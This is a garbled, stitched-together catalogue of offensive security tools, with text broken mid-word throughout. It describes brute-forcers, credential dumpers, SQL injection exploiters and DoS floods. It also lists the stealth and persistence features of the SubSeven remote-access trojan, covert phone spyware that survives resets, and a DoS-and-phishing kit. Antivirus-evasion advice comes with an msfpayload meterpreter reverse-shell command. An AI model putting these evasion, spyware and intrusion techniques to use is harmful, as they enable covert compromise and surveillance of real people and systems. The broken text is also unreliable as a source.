tool. Credentials Bruter http://sourceforge. a combination file format allows the user to refine their target listing.cqure. Medusa Parallel Network Login Auditor http://www. In addition it will detect if an account lacks pre-authentication. uncovering cached passwords and analyzing r outing protocol.Modular design. . Brute-force testing can be performed against mu ltiple hosts. It was built to hel p companies secure their networks by proactively testing all their hosts and net . The goal of Bruter i s to support a variety of services that allow remote authentication. The author considers following items as some of the key features of t his application: . Cain & Abel http://www.Flexible user input. This tool is intended to demonstrate the importance of choosing strong passwords.Thread-based parallel testing.net/wp/krbguess/ KrbGuess is a small and simple tool which can be used during security testing to guess valid usernames against a Kerberos environment. . each item can be either a single entry or a f ile containing multiple entries.mod file.

php RSYaba is tool to run brute force attacks against various services in a similar way to Hydra and Medusa. even stricter.com/rsyaba-security-tool. a feature was added that is missing in all the ot her HTTP bruteforcers. It allows for rapid. services.com/research.working devices for poor passwords. 7 and 2008 (Vista was not actually tested yet.ampliasecurity. with the introduction of the RDP module. Windows Credentials Editor http://www. Download RSYaba The tool is written in Ruby so modifying the scripts is a lot simpler than havin g to change C/C++ code then recompile. Ncrack's features include a very flexible interface granting the user full contr ol of network operations. The same behaviour applie s for passing the options –user ” or –pass ”. but it should work) . Vista. forms that use unique tokens to preven t brute force attacks. While writing the HTTP module. All the modules so far are based on stand ard Ruby gems so they handle all the protocol stuff which means there is a nice level of abstraction for the actual attack framework. fo r example. * Improved the Ncrack scorpion logwith an updated SVG version. This can be used. Users are well advised tr eadhttp://seclists. change. Supports Windows XP. yet reliable large-scale audit ing of multiple hosts. RSYaba http://www. * Ncrack can now crack the Remote Desktop Protocol on all Windows versions from XP and above. MySQL. remote desktop connections. a comm and-line syntax similar to Nmap and a dynamic engine that can adapt its behaviou r based on network feedback. which forces Ncrack to quit cracking a service after i t finds one credential for it. Specifying the option twice like ‘-f -f‘ will cause N crack tcompletely quit after any credential is found on any service. timing templates for ease of use. list and delete associated credentials (ex. Ncrack will now test a blank entry w henever it sees an empty line in any of the wordlists. Security professionals also rely on Ncrack w hen auditing their clients.randomstorm. allowing for very sophisticated bruteforcing attacks. runtime interaction similar to Nmap's and many more. Ncrack was started as a "Google Summer of Code" Project in 2009. and SSH and new modules will be added t o it and this page updated accordingly.org/nmap-dev/2010/q3/450 for cracking Windows XP machines sin ce they can’t handle many concurrent RDP connections. While it is alr eady useful for some purposes. to perform pass-the-hash on Windows and also obtain NT/LM hashes from memory (from interactive logons. Ncrack was designed using a modular approach. * Added support for blank-password testing.html Windows Credentials Editor (WCE) allows to list logon sessions and add. * Implemented the SMB module which can crack Microsoft’s SMB/CIFS services as well as UNIX Samba servers. etc. * Introduced the ‘-f’ option. The tool currently supports HTTP. it is still unfinished. The tool was written after bad experiences at getting e xisting tools working correctly with HTTP and SSH so it was decided to make a to ol that would be easier to configure. the ability to handle authentication that relies on a coo kie already being set and. alpha quality software. 2003.: LM/NT hashes).) wh ich can be used in further attacks.

.NET Forum Proxy Leecher LOIC Longcat Flooder (distributed and standalone) Ping Flood rok/i/ts SMAC Sinflood wgetraep Some gay app to unlimit ip connectiosn SMTP Server All of the new DoS equipment Linux/Unix/Mac pygetraep Web-Based Download links to webservers: WAMP (windows) XAMPP (windows/linux/mac/solaris) and MAMP (mac) o AnonProxy* o FormFlood Form Flooder* o Mail flooder o Miniloader o Myspace phisher o Vampire Raep script o Raid Imagery + Hueg3. = Short description = .com watermarks + Goatse * Moar new shit o /i/Kit + Hackerpackage included o General updates and a lot of shit added. shellcodeexec https://github.thc-hydra http://freeworld. Items marked with a * are new or updated in the most recent version.org/thc-hydra/ A very fast network logon cracker which support many different services Dark Alley Dangerous Kitten http://partyvan.com/2011/04/execute-metasploit-payloads-b. and the subtitle "It's dange rous to go alone. many of which already on her e.. but there are some new tools that are not anywhere else on the w/i/ki. take this".blogspot.thc.com/inquisb/shellcodeexec http://bernardodamele.jpg + EbaumsWorld. Tool List (v3 update) * o o o o o o o o o o o o o * o * o Windows (and Wine for Linux and Mac fags) BWraep BWRaeper. It is a set of tools. with the picture of a kitten in a hand.info/wiki/Dangerous_Kitten "Dangerous Kitten" got its name from how it was originally spread--a rar embedde d in a jpg.

= Background = Most of the shellcode launchers out there. but does not stop few hard-to-die anti viruses to detect your backdoor. Set the BufferRegister variable to EAX registry where the address in memory of the shellcode will be stored.168. * Works in DEP/NX-enabled environments: it allocates the memory page where it stores the shellcode as +rwx . 21 out 41 anti viruses detect it as malicious . copy over your shellcode and execute it.Readable Writable and eXecutable. Take for instance the following command line: $ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=process LPORT=4444 LHOST=1 92. that as soon as it lands on the AV-protected target system is recognized as malicious and potentially blocked (depending on the on-access scan settings) by many anti virus products. still a lot. does not necessarily consider 64-bit architecture and Windows systems.exe. no AV detect it as malicious. = Description = This script and the relevant project files (Makefile and Visual Studio files) allow you to compile the tool once then run your shellcode across different architectures and operating systems.shellcodeexec is a small script to execute in memory a sequence of opcodes. it solves a common real world issue: the target system's anti virus software blocking a Metasploit-generated payload stager (either EXE of ELF). it is limited to POSIX. Moreover. * It supports alphanumeric encoded payloads: you can pipe your binary-encoded shellcode (generated for instance with Metasploit's msfpayload) to Metasploit's msfencode to encode it with the alpha_mixed encoder. So the question is.http://goo.1 R | msfencode -a x86 -e x86/shikata_ga_nai -o /tmp/payload. less AV softwares detect it. . By encoding it multiple times with msfencode. This works just fine. to avoid get_pc() binary stub to be prepended to the shellcode. I have been surfing the Net and found some interesting tutorials and guides about packing. payload. how cool would it be to have a final solution to avoid all this hassle? This is exactly where this tool comes into play! = Features = shellcodeexec: * Can be compiled and works on POSIX (Linux/Unices) and Windows systems. At the time of writing this text. This is all interesting. However. * Can be compiled and works on 32-bit and 64-bit architectures.exe -t e xe This generates a Metasploit payload stager. detail how to allocate a memory page as readable/writable/executable on POSIX systems. including proof of concepts part of many "security" books. * As far as I know.gl/HTw7o. compressing.136. obfuscating and applying IDA-foo to portable executables et similar in order to narrow down the number of AV products that can detect it as a malicious file.

subseven.* Spawns a new thread where the shellcode is executed in a structure exception handler (SEH) so that if you wrap shellcodeexec into your own executable. This tool is aim ed at people who want that little bit more power and control over remote compute r management.Traffic Viewer (lists active network connections on remote host) . easy to use remote administration tool (RAT) designed to work on all current Windows platforms. Features overview SubSeven.Server Options (stop/start/remove server on remote host) Built in Tools: .Fun Manager (general office pranks) Spying: .Webcam (view the webcam on the remote host) .4 kb Network: .Service Manager (refresh services/install services/remove services/remote host management) .Installed Apps (list installed applications) . storage.Password (recover lost/forgotten passwords for various browsers. allows mapping) System: .NO-IP account / IP auto update tool (allows you to enter your NO-IP account in . Please use this tool responsibly and read and accept the disclaime r prior to use.Static IP Notification Client (SIN client) (a listening tool that allows your remote hosts to notify you when they are online) . You accept full liability and responsibility for your actions when using Su bSeven. mail clients and instant messengers) .Network Browser (list shares on remote host.3 is a simple.Desktop (view and click the remote host desktop) . subSeven http://www. it avoids the whole process to crash in case of unexpected behaviours.Transfer View (view upload/download details <-> from host) .Window View (View active Windows on SubSeven) Managers: . If you do not agree with the disclaimer.php SubSeven 2. please do not use the t ool. both 32bit and 64bit.Registry Manager (modify/add/remove registry entries on host) .Process Manager (view active/kill active processes to dll level) .Remote Shell (view the command prompt on the remote host as if it was local) .2.TCP Tunnel (relay remote host ports to local PC) .org/home. Do not use this tool on computers you are not authorized to control.Audio (capture mic/line-in input no the remote host) GIF .File Manager (upload/download/run/delete/play files on host) .exe (911KB) Client: .

The binded file will execute along with t he server .0.Protect server (allows you to password protect the server) .Run Visible (allows the host computer to know the server is running) .Disable Win defender (turns off windows defender) .Shortcut Panel (allows you to add your favorite utilities as shortcuts .Read (allows you to browse and then read the server settings) .Install directory (allows you where you would like the server to be installed) .for example you may want to execute tinyvnc for full screen manageme nt) Win Firewall: .S. e.host.com.dll/exe (load up an exe or .exe (254KB) Server Status: .0.dll file to extract icons and use them on yo .formation to auto update the website of IP changes) .Server extensions (allows you to check which extension you want the server to use) .I. generate the s cript and upload it to your php/cgi host) Bind Files: .Disable UAC (turns off UAC upon next reboot) Exe Icon: .Load .Melt server (allows the server to disappear once executed) .Hint and Active running status bar (gives you some helpful information) EditServer. For example Remote Host Server) Notifications: .N (specify your local network external IP address here.1) .Server name (what it says) Fake Messages: Enable (actives the fake message option) Message icon (allows you to choose your icon for the message) Available buttons (select what options the host computer has to press) Message title (the title text for the message) Message text (the body text of the message) Test (allows you to test the message on your PC) Startup methods: Registry Run (installs under registry run key) Registry RunServices (installs under registry runservices key) Registry RunOnce (installs under registry runonce key) ActiveX (installs in the activeX key path) Explorer (installs on execution of explorer shell) Winlogon (same as above for winlogon) Policies (executes upon windows policies startup) Key name (keyname for registry entries. or for local testi ng 127.Disable Firewall (turns off the firewall providing UAC is off) .Select a file to bind to the server.Wait for reboot (waits to execute upon next reboot) .g http://www.CGI/PHP (specify your website address.

. .com/dbaudit/download.ur server) .com/users/quakerdoomer/v2/w/ winAUTOPWN is an auto (hacking) shell gaining tool.This is your configured server to deploy on the remote host. MySQL and Microsoft SQL Server.firecat.TXT) * PortScan is multi-threaded. * No need to debug. Sybase. * Scans all ports 1 -* 65535 after taking the IP address and tries all possible exploits according to the list of discovered open ports (OpenPorts.htm DB Audit Expert is a professional database auditing solution for Oracle.Provides analytical reports that reduce large amounts of audit data to compreh ensive summaries thus enabling to easily identify various database security viol ations. Captures both regu lar and "back-door" access to audited database systems.Features unified auditing graphical interface that shortens the learning curve and is easy to use. change or deletion. Features: * Contains already custom-compiled executables of famous and effective exploits alongwith a few original exploits. data creation.exe (58. Features : . .5KB) . script or compile the source codes. * Doesn’t require any Database at the back-end like others * Can be also be used to test effectiveness of IDS/IPS * Launched exploits are independent and doesn’t rely on service fingerprinting (to avoid evasion.fr/---sys/SubSeven_2. . Download >> http://www. What makes DB Audit really unique is its built-in support for multiple auditing methods giving you the flexibility to choose the best fit for your database security requirements.Provides analytical reports that help to identify which processes and users ar e hogging system resources.Provides audit trail details that are unavailable from native database audit u tilities.3. . Autohack your targets with least possible interaction. IPS and other monitoring sensors/softwares. . DB2.rar winAUTOPWN http://blacklistedhosting. auditors and operators to track and a nalyze any database activity including database security.softtreetech.ico files) Server. security administrators. It can also be used to test IDS.Features centralized auditing control of multiple database systems from a sing le location providing ease of management. access and usage.Improves system security and ensures system accountability.Browser (browse to . if any) Database DB Audit http://www. DB Audit Expert enables database and syste m administrators. .Provides ability to generate real-time email alerts to key personnel when chan ges occur to sensitive data.

retrieve DBMS users and password h ashes..itsecteam.net/ ExploitMyUnion is a tool written in Python with a PyQt user interface made to au tomate sql injection exploitation.. By using this software us er can perform back-end database fingerprint. The power of Havij that makes it different from similar tools is its injection m ethods. Proxy support 7. The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users. dump tables and columns.+. 3. Avoid using strings (magic_quotes similar filters bypass) 10 Bypassing illegal union 11 Full customizable http headers (like referer and user agent) 12 Load cookie from site for authentication .Full compatibility with all host Operation Systems on which the supported data bases can run. . Automatic database detection 3. 1. Real time result 8. enabling security personnel to c hoose specific types of database operations and data changes that must be monito red and recorded in the audit trail. UNIX. 2.com/en/projects/project1. 5. including but not limited to Windows NT. fetching data from the database. Automatic keyword detection (finding difference between the positive and nega tive response) 5. 7.Frees DBA from the need to create and manage finely-tuned database triggers fo r data-change auditing purposes. 6. Options for replacing space by /**/. The success rate is more than 95% at injectiong vulnerable targets using Havij. It can take advantage of a vulnerable web application. ExploitMyUnion http://exploitmyunion. Trying different injection syntaxes 6. 4. Havij http://www. Automatic type detection (string or integer) 4. Features: 1. against IDS or filters 9. z/OS.Supports flexibility auditing configurations. VMS. OS/390 ..Provides totally transparent system-level and data-change auditing of any exis ting applications without requiring any changes to be made in those applications .htm Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page. Linux. Supported Databases with injection methods: MsSQL 2000/2005 with error MsSQL 2000/2005 no error (union based) MySQL (union based) MySQL Blind MySQL error based Oracle (union based) MsAccess (union based) 2. .sourceforge. running SQL sta tements and even accessing the underlying file system and executing commands on the operating system.. .

htm SFX-SQLi (Select For XML SQL injection) is a new SQL injection technique which a llows to extract the whole information of a Microsoft SQL Server 2005/2008 datab ase in an extremely fast and efficient way.hp.ip domain reverse.net/wp/oscanner/ Oscanner is an Oracle assessment framework developed in Java. SFX-SQLi http://www.13 14 15 16 17 18 19 20 21 Guessing tables and columns in mysql<5 (also in blind) and MsAccess Fast getting tables and columns for mysql Multi thread Admin page finder Multi thread Online MD5 cracker Getting DBMS Informations Getting tables.com/campaigns/2008/wwcampaign/1-57C4K/index. NTLM and Certificate authentications MySQL.com/papers/sfx-sqli-en.Sybase.command execute. his is a list of the available features: * Full support for * Full support for * Full support for * Full support for * Support for file ack.kachakil.MSSQL.net/projects/safe3si/ Safe3 SQL Injector is one of the most powerful penetration testing tool that aut omates the process of detecting and exploiting SQL injection flaws and taking ov er of back-end database servers.etc. Digest. * Super bypass WAF Scrawlr https://h30406. Safe3 SQL Injector http://sourceforge. Oracle.md5 cr .cqure.web path guess. PostgreSQL.ACESS. It has a plugin-ba sed architecture and comes with a couple of plugins that currently do: Sid Enumeration Passwords tests (common & dictionary) Enumerate Oracle version Enumerate account roles Enumerate account privileges Enumerate account hashes Enumerate audit information Enumerate password policies Enumerate database links The results are given in a graphical java tree. columns and data Command executation (mssql only) Reading system files (mysql only) insert/update/delete data OScanner http://www. developed by the HP Web Security Research Group in coordination with th GET/Post/Cookie Injection HTTP Basic. which is able to convert the cont ent of a table into a single string.Sqlite Error/Union/Blind/Force SQL injection acess. so its contents could be appended to some f ield injecting a subquery into a vulnerable input of a web application. This technique is based on the FOR XML clause.DB2.www3.php Scrawlr.

working with the first working .Select POST or GET .Scan site for folders & files . Default – 1) bsqlbf http://code.Proxy grabber Post/Get/Proxy/SOCKS4-5/Cookies/Timeout/Multithread/HTTPS+Authorization supporte d . Oracle The tool supports 8 attack modes(-type switch):Type 0: Blind SQL Injection based on true and false conditions returned by backend server Type 1: Blind SQL Injection based on true and error(e.Ability to change user agent . Toolza http://pentestit.com/p/bsqlbf-v2/ This perl script allows extraction of data from Blind SQL Injections. Databases supported: 0.FTP checker .Ability to select HTTP-protocol (0 – HTTP/1.0.1.google.Select a timeout connection . MS-SQL 1. auto-sensing type socks (45). PostgreSQL 3.com/2010/03/22/toolza-sql-injection-tool-options/ Toolza .LFI/Reader/Loade_file() bruter .SQL Injection Tool with many options Features of toolza: . without authorization.Ability to insert cookies .FTP bruter . Type 3: extracting data with SYS privileges (ORACLE dbms_export_extension exploi t) Type 4: is O. It accepts custom SQL queries as a command line parameter and it works for both integer an d string based injections.g syntax error) returned b y back-end server.Ability to change the referrer .e MSRC. Type 2: Blind SQL Injection in "order by" and "group by". MySQL 2. is short for SQL Injector and Crawler.txt) – avtocheking.Proxy checker .txt) – avtocheking. Scrawlr will crawl a website whil e simultaneously analyzing the parameters of each individual web page for SQL In jection vulnerabilities. It can even provide proof positive results by displaying the type of backend database in us e and a list of available table names.S code execution (ORACLE dbms_export_extension exploit) .Support for proxy (file proxy. working with the first working .Support for SOCKS4-5 (file socks. Scrawlr is lightning fast and uses our intelligent engi ne technology to dynamically craft SQL Injection attacks on the fly. 1 – HTTP/1.

sourceforge.net/ sqlmap is an open source command-line automatic SQL injection tool. execute arbitrary commands on the operating system. es tablish an out-of-band stateful connection between the attacker box and the data base server via Metasploit payload stager. both TCP and UDP * DNS-tunneled pseudo-shell. database stored procedure buffer over flow exploitation or SMB relay attack and more. run generator.KUPP$PROC. privileges. enumerate use rs. Its goal is to detect and take advantage of SQL injection vulnerabilities in web application s.S code execution SYS. even in a very hostile environmen t.exe f irst Type 8: is O. Its main goal is to provide an i nteractive access on the vulnerable DB server.CREATE_MASTER_PROCESS(). read or write either text or binary files on the file system. the user can c hoose among a variety of options to perform an extensive back-end database manag ement system fingerprint. databases. retrieve DBMS session user and database. Once it detects one or more SQL injections on the target host. DBA Privs -cmd=revshell Type 7 supports meterpreter payload execution.net/ qlninja is a tool to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end.VALIDATE_REMOTE_RC exploit Type 7: is O. run generator. sqlmap http://sqlmap.Multi-Platform PHP script to automate site Pentest fo r SQL Injection Vulnerabilties.Type 5: is reading files (ORACLE dbms_export_extension exploit.S code execution DBMS_JAVA_TEST. but the DB server can resolve external hostnames . run his own SQL statement.S code execution DBMS_REPCAT_RPC.sourceforge. sqlninja http://sqlninja. in order to find a port that is allowed by the firewall of the target network and use it for a reverse shell * Direct and reverse bindshell.net/projects/hexjector/ Hexjector is an Opensource. when no TCP/UDP ports are available for a direct/re verse shell. Features * Fingerprint of the remote SQL Server (version. with JAVA IO Permissions -cmd=revshell Type 8 supports meterpreter payload execution. It should be used by penetration testers to help and automate the process of taking over a DB Server when a SQL Injection vulnerability has been discovered. based on java) Type 6: is O. xp_cmdshell availability. us er privileges.FUNCALL. user performing the queries. DB authentication mode) * Bruteforce of ’sa’ password (in 2 flavors: dictionary-based and incremental) * Privilege escalation to sysadmin group if ’sa’ password has been found * Creation of a custom xp_cmdshell if the original one has been removed * Upload of netcat (or any other executable) using only normal HTTP requests (no FTP/TFTP needed) * TCP/UDP portscan from the target SQL Server to the attacking machine. dump entire or user's specified DBMS tables/columns. password hashes.exe f irst hexjector http://sourceforge.

NeoPwn http://www. Inguma is still being heavily developed so be sure to stay current and check back for news and updates.xda-developers. The framework includes modules to discover hosts.net/ OAT is an Open Source Security tool designed to check the password strength of M icrosoft Office Communication Server users. While the current exploitation capabilities in Inguma may be limited. of course. By default. After a password is compromised. PeachFuzzer . All commands will be silently received and del eted immediately and results will be issued back to sender. fuzz targets. gather information about.com/p/inguma/ nguma is a penetration testing toolkit entirely written in python. Mobile (OAT) OCS Assessment Tool http://voat. to produce the first ever BackTrack Mobile suite! Phone Creeper http://forum. Phones running this software can be remotel y controled by sms text messages. proxies and application vulnerabilities scanners. exploits. Pre-configured settings can be added to the installer to have your own default p assword and phone number to receive live updates.* Evasion techniques to confuse a few IDS/IPS/WAF * Integration with Metasploit3. this progr am provides numerous tools for information gathering and target auditing.php?t=527423 Phone Creeper is a phone espionage suite It can be silently installed by just in serting an sd card with the files below on it. to obtain a graphical access to the remote DB se rver through a VNC server injection Inguma http://code. The NeoPwn Mobile Pentesting project is proud to announce that it is merging wit h BackTrack.net/projects/firecatpackage/ FireCAT (Firefox Catalog of Auditing exTension) is a mindmap collection of the m ost efficient and useful firefox extensions oriented application security auditi ng and assessment. this program will silently reinstall itself even after a hard reset.com/showthread.google. The program does not show up under installed programs or running programs and al lows for a useful array or features. OAT demonstrates potential UC attacks that can be performed by legitimate users if proper security controls are not in place.” Multipurpose FireCat http://sourceforge.neopwn.sourceforge. if the memory card with these files is still in the device. bru te force user names and passwords and. FireCAT is not a remplacement of other security utilities and softwares as well as fuzzers.com/ The first network auditing distribution for mobile phone released.

com/PeachQuickstart Scapy https://www. tcpdump. TCP Flood Denial of Service testing tools. It supports TCP. arpspoof. xprobe. It provides classes to interactively create packets or sets of packets. A s ubset of the stuff you can do using hping: * * * * * * * * * Firewall testing Advanced port scanning Network testing.http://peachfuzzer. send them over the wire.org/projects/scapy/ Scapy is a powerful interactive packet manipulation tool. has a tracerout e mode. netw ork scanner. using different protocols. under all the supported protocols Remote OS fingerprinting Remote uptime guessing TCP/IP stacks auditing hping can also be useful to students that are learning TCP/IP. it can be used in ma ny ways by people that don't care about security to test networks and hosts. http://peachfuzzer.com/spiderLabs-tools. manipulate them. match answers and replies. but hping isn't only able to send ICMP echo requests. arp-sk.org/ hping is a command-line oriented TCP/IP packet assembler/analyzer. For example. Report modules are possible and easy to make.hping.trustwave. tethere al. ICMP and RAW-IP protocols. and mor e. the Suite has Honeypot. logging interface. hping http://www. queso. pentbox http://www.com/ Peach is a SmartFuzzer that is capable of performing both generation and mutatio n based fuzzing.pentbox. Interaction is provided by the Python interpreter. sniff other packets from the wire. etc. so Python programming stru ctures can be used (such as variables. The interface is inspired to the ping(8) unix command. It additionally allows fo r the configuration of a fuzzing run including selecting a data transport (Publi sher). . and many other feat ures. arping. UDP.net/ PenTBox is a Security Suite that packs a lot of security and stability testing o riented programs for networks and systems. firewalk. and functions). nma p. hping. and relationships in the data to be fuzzed. It is intended to do the same things as ttlscan. network discovery tool. the ability to send files between a covered channel. Peach requires the creation of PeachPit files that define the structure. p0f. type in formation. fragmentation Manual path MTU discovery Advanced traceroute. TOS. packet generator.secdev. irpas. etc. While hping was mainly used as a security tool in the past. and packet sniffer.php SpiderLabs has developed dozens of tools over the years. SpiderLab Tools https://www. loops. Most of them end up as internal-only tools since they eventually make their way into one of Trustwave's product offerings.

licensed under GNU/GPLv3. DDOSIM http://sourceforge. HTTP server). Port Scanner. It attempts a denial-of-service attack on the tar get site by flooding the server with TCP packets. ddosim s tarts the conversation with the listening application (e. The program w . UDP packets. It uses DLL injection and function hooki ng techniques to redirect network related function calls so that data transmitte d and received by local applications can be observed and modified.Secure Instant Messaging. It is used for DDoSing websites and testing server sec urity. Traffic can be intercepted in real-time. written in C# and developed by "praetox". or HTTP requests with the intention of disrupting the service of a particular host. ddos im simulates several zombie hosts (having random IP addresses) which create full TCP connections to the target server.net/projects/loic/ Low Orbit Ion Cannon (LOIC) is an open source program written in McDonald's Visu al C# coding environment. After completing the connection. All programs are being developed by PenTBox Team and the contributors of the Fre e Software community to the project. Secure passwords generator and m ore. MacOS and more). ddosim is written in C++ and runs on Linux. It is free. or manipulated with regular expressions and action scripts Low Orbit Ion Cannon http://sourceforge.net/tools/echomirage Echo Mirage is a generic network proxy.net/6tunnel/ 6tunnel allows you to use services provided by IPv6 hosts with IPv4-only applica tions and vice-versa. and oriented to GNU/Linux systems (but compatible with Windo ws. Windows encryption and OpenSSL functions are also hooked so that plain text of d ata being sent and received over an encrypted session is also available. LOIC (Low Orbit Ion Cannon) is a network stress testing application.bindshell. Network 6tunnel http://toxygen. Its current functionalities include: * * * * HTTP DDoS with valid requests HTTP DDoS with invalid requests (similar to a DC++ attack) SMTP DDoS TCP connection flood on random port Echo Mirage http://www.g. Fuzzer. Programmed in Ruby.net/projects/ddosim/ Application Layer DDoS Simulator ddosim is a tool that can be used in a laboratory environment to simulate a dist ributed denial of service (DDOS) attack against a target server. It can bind to any of your IPv4 (default) or IPv6 addresse s and forward all data to IPv4 or IPv6 (default) host. The test will s how the capacity of the server to handle application specific DDOS attacks.

by using all av . to stress multicast networks) * To precisely measure jitter (delay variations) between two hosts (e.perihel.. malformed packets. and is cur rently being used by Operation Avenge Assange (Organized by Operation Payback) t o attack the websites of companies and organizations that have opposed WikiLeaks http://insurgen.. Mausezahn is quite fas t. g.com/pyloris/ PyLoris is a tool for testing a web server’s vulnerability to a particular class o f Denial of Service (DoS) attacks. The vulnerabilities exist in som e implementations of the TCP protocol. Mausezahn is basically a versatile packet creation tool on the comm and line with a simple syntax and context help. specifically in the way some TCP implemen tations keep track of the state of TCP connections. DPI vendors all claim high levels of success at identify ing such traffic based on the flow patterns and handshake signatures common to p rotocols like BitTorrent and Skype. OpenDPI http://code. It uses the Slowloris method. It is mainly used to test VoIP or multicast networks but also for security audits to check whether your systems ar e hardened enough for specific attacks. differs from ipoque’s commerc ial scanning engine in its high-priced DPI hardware.and more. even if they cannot crack the encryption and examine the content of those transmissions.) .google. for Vo IP-SLA verification) * As didactical tool during a datacom lecture or for lab exercises * For penetration testing of firewalls and IDS * For DoS attacks on networks (for audit purposes of course) * To find bugs in network software or appliances * For reconnaissance attacks using ping sweeps and port scans * To test network behaviour under strange circumstances (stress test.The Naptha vulnerabilities ar e a type of denial-of-service vulnerabilities researched and documented by Bob K eyes of BindView's RAZOR Security Team in 2000. .org/wiki/Naptha TCP State Exhaustion Testing With Network Expect .as exploited during Project Chanology to attack Scientology websites.info/wiki/Low_Orbit_Ion_Cannon Mausezahn http://www. It could also be used within (ba sh-) scripts to perform combination of tests.info/wiki/Low_Orbit_Ion_Cannon http://www. Naptha http://netexpect. released under the LGPL license..partyvan. The open-source version is much slower and (more importantly) doesn’t reveal ipoque’s methods for identifying e ncrypted transmissions. Pyloris http://motomastyle. Mausezahn can be used for example: * As traffic generator (e.at/sec/mz/ Mausezahn is a free fast traffic generator written in C which allows you to send nearly every possible and impossible packet. By the way. Gigabit Ethernet) I measured 755 Mbit/s using the interface packet counters of an HP ProCurve 5400 switch.4 GHz.com/p/opendpi/ The OpenDPI engine. g.. when started on my old PIII-Laptop (1. and allow an attacker to exh aust the resources of a system under attack without utilizing much resources on the system used to launch the attack.

you need to register the machine that you intend to run Rebind from as a nameserver. . two Web servers and an HTTP proxy server into a single Linux binary.NET Framework 2. then you must configure your domain to use that nameserver.com Find human relationships using XHTML Friends Network (microformats) RawCap http://www. including WiFi and PPP interfaces Minimal memory and CPU load Reliable and simple to use Usage You will need to have administrator privileges to run RawCap. DNS Rebinding Now. model.0 No installation required. In the authors words “Actually.0. so you may have to search around a little.1 (localho st/loopback) RawCap.exe and sniff Can sniff most interface types. QuickRecon http://code. IP address. and all HTTP request methods. It uses the Slowloris method. just download RawCap. by you. etc. PyLoris is a scriptable tool for testing a web server’s vulnerability to Denial of Service (DoS) attacks which supports SOCKS. including 127. or has been compromised. how do you get it to work. web servers cannot complete valid requests. Rebind http://code. host name. Most registrars will let you perform both of these actio ns.com/?page=RawCap RawCap is a free command line network sniffer for Windows that uses raw sockets. Properties of RawCap: Can sniff any interface that has got an IP address. This is done in two steps: first. It does not require prior knowledge of the target router or the router’s configuration set tings such as make.ailable connections.com/p/quickrecon/ QuickRecon is a simple information gathering tool that allows you to: * * * * Bruteforce subdomains of a target domain Perform zone transfer Gather email addresses from Google.exe is just 17 kB No external libraries or DLL's needed other than .com/p/rebind/ Rebind is a DNS rebinding tool.netresec. SSL.google. Rebind integrates a DNS server. and does not use any anti -DNS pinning techniques. It can let you access a target router’s internal Web interface! The bes t part is remote administration does not need to be enabled for this attack to w ork! All that is required is that a user inside the target network surf to a Web site that is controlled.com and Bing. You could possibly us e social engineering tricks to trick a user into viewing this web site. that implements the multiple “A” record DNS rebindin g attacks.google. you need to configure your domain to use Rebind as your primary DNS ser ver.0. although some don’t and many make it difficult to find these settings.

which will allow Rebind to accept and handle all DNS requests for your domain.” Rebind has been specially programmed to work with only Linux operating systems.. enjoy. ICMP – Internet Control Message Protocol IGMP – Internet Group Management Protocol TCP – Transmission Control Protocol UDP – User Datagram Protocol .com. Now.4shared. (We actually were left wondering about that!) SSL Capable NetCat http://gomor. 4.mydomain . that is capable of: * Send sequentially (i. Once you have registered your nameservers. This is now done. 3. it must be run as root. 2. ALMOST on the same time) the following protocols: 1. It wi ll not work with IPv6 either. You will want to register t wo because most registrars will require your domain to have at least two nameser vers.com and ns2.mcafee. It will also work on 64-bit operat ing systems.e. you will enter ns1. it might work on BSD. F22 Raptor) is a tool designed t o perform stress testing. For example.a.com/us/downloads/free-tools/sharescan.Go to the registrar where you registered your domain name (Host-Unlimited. Slowloris http://ha. GoDad dy. Yahoo. Name the nameservers ns1 an d ns2 and set their IP addresses to that of the machine from where you intend to run Rebind.) and first register two nameservers.org/slowloris/ Slowloris HTTP DoS T50 Sukhoi PAK FA http://www. and I tried to add them in this Perl version. and you must ha ve iptables installed and listed in $PATH. how to use it and that it should have been integrated in all UNIX systems a long time ago. netcat lacke d some features. but NOT on Windows. This tool can help admini strators identify systems that have wide open permissions or no permissions — pote ntial vulnerabilities that should be remediated.ckers. Now all DNS traffic will be directed to the machine where you intend to ru n Rebind. we might as well play with it for now! Remember! You have to have the end-user visit http://your-domain-name/init and n ot just http://your-domain-name/.k. and you want Rebind to handle all DNS lookups. It has all images filtered out. Only pre-requisite is that. etc. TCP and UDP proxying and IPv4/IPv6 proxying features.org/bin/view/GomorOrg/SslNetcat You all know what is netcat (written by Hobbit in 1996).aspx ShareScan is a free utility that enables IT security personnel to identify open Windows file shares available on the internal network. It is a powerful and an unique packet injection tool. So.html T50 Sukhoi PAK FA Mixed Packet Injector (a. unless I missed a bug. Considering that we have another year for IPv6 to be popular. If for exa mple your domain is ‘mydomain.mydomain. SSL support. go do your domain DNS settings and se t these nameservers as the authoritative nameservers for your domain. ShareScan http://www.com’.com/dir/wlw1Gawh/NB_Research_Labs.

2. For network security te sting.atteq. making it a “second to n one” tool: 1. * Perform “Stress Testing” on a variety of network infrastructure. It modifie .* Send a (quite) incredible amount of packets per second.1Q IEEE 802. UDP Unicorn http://sourceforge. network devices a nd security solutions in place. Uses w insock library to create UDP sockets and flood a target. More than 120. Oh! Did we forget to tell you that this is an open source tool.org/thc-ipv6/ A complete tool set to attack the inherent protocol weaknesses of IPV6 and ICMP6 . Wireshark dissectors are us ed.thc. Wont say a lot about this – just download and see for yourself the power of this t ool. More than 1. validating the Firewall rules and Intrusio n Detection System/Intrusion Prevention System policies. Currently.yersinia.com/ HotFuzzThe HotFuzz project aims at providing a tool for discovering security vul nerabilities in network applications. programmed in C? THC-IPV6 http://freeworld.net/ Yersinia is a network tool designed to take advantage of some weakeness in diffe rent network protocols. Attacks for the following network protocol s are implemented (but of course you are free for implementing new ones): * * * * * * * * * Spanning Tree Protocol (STP) Cisco Discovery Protocol (CDP) Dynamic Trunking Protocol (DTP) Dynamic Host Configuration Protocol (DHCP) Hot Standby Router Protocol (HSRP) IEEE 802. and includes an easy to use packet factory library. but others are coming ( tell us which one is your preferred).000 pps of SYN Flood (+60% of the network’s uplink) in a 100BASETX Network (Fast Ethernet). At the base is the Peach fuzzing framework . It pretends to be a solid framework for analyzing and te sting the deployed networks and systems. * Simulate Denial-of-Service attacks. To make HotFuzz understand the existing protocols. there are some network protocols implemented. tools and feedback to the thc-ipv6 project.000. It implements a proxy functionality between network 